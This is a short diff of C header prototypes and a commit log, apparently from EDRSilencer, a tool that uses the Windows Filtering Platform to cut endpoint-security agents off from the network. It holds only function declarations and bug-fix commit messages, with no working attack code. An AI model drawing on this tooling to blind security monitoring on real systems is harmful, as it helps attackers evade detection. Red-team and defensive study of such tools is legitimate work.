-void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wCharArraySize);
+void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wCharArraySize);
 BOOL GetDriveName(PCWSTR fileName, wchar_t* driveName, size_t driveNameSize);
 ErrorCode ConvertToNtPath(PCWSTR filePath, wchar_t* ntPathBuffer, size_t bufferSize);
 BOOL FileExists(PCWSTR filePath);
 ErrorCode CustomFwpmGetAppIdFromFileName0(PCWSTR filePath, FWP_BYTE_BLOB** appId);
 void FreeAppId(FWP_BYTE_BLOB* appId);
 BOOL GetProviderGUIDByDescription(PCWSTR providerDescription, GUID* outProviderGUID);
Author	SHA1	Message	Date
netero1010	0e73a7037e	Verion 1.4: bug fixes	2024-11-03 23:52:18 +08:00
Chris Au	dde9400fa9	Merge pull request #23 from danikdanik/patch-2 checking the SID structure for TokenIntegrityLevel	2024-11-03 23:43:54 +08:00
Dani Kamanovsky	5cb185b22f	merge https://github.com/netero1010/EDRSilencer/pull/22	2024-11-03 15:52:39 +02:00
Dani Kamanovsky	73b18abe6f	checking the SID structure for TokenIntegrityLevel if the SID for TokenIntegrityLevel isn't the expected structure, GetSidSubAuthority might produce UB.	2024-11-03 15:43:31 +02:00
Chris Au	9863ce4193	Merge pull request #22 from danikdanik/patch-1 memory leak in GetProviderGUIDByDescription	2024-11-03 21:42:48 +08:00
Dani Kamanovsky	c8eebc0d98	memory leak in GetProviderGUIDByDescription memory allocation is not freed if a match is found in the loop, leading to a memory leak	2024-11-03 15:29:25 +02:00
netero1010	57f6bb6b24	Version 1.3	2024-01-07 21:18:23 +08:00
netero1010	fb8f4b43a9	Version 1.2	2024-01-05 01:34:33 +08:00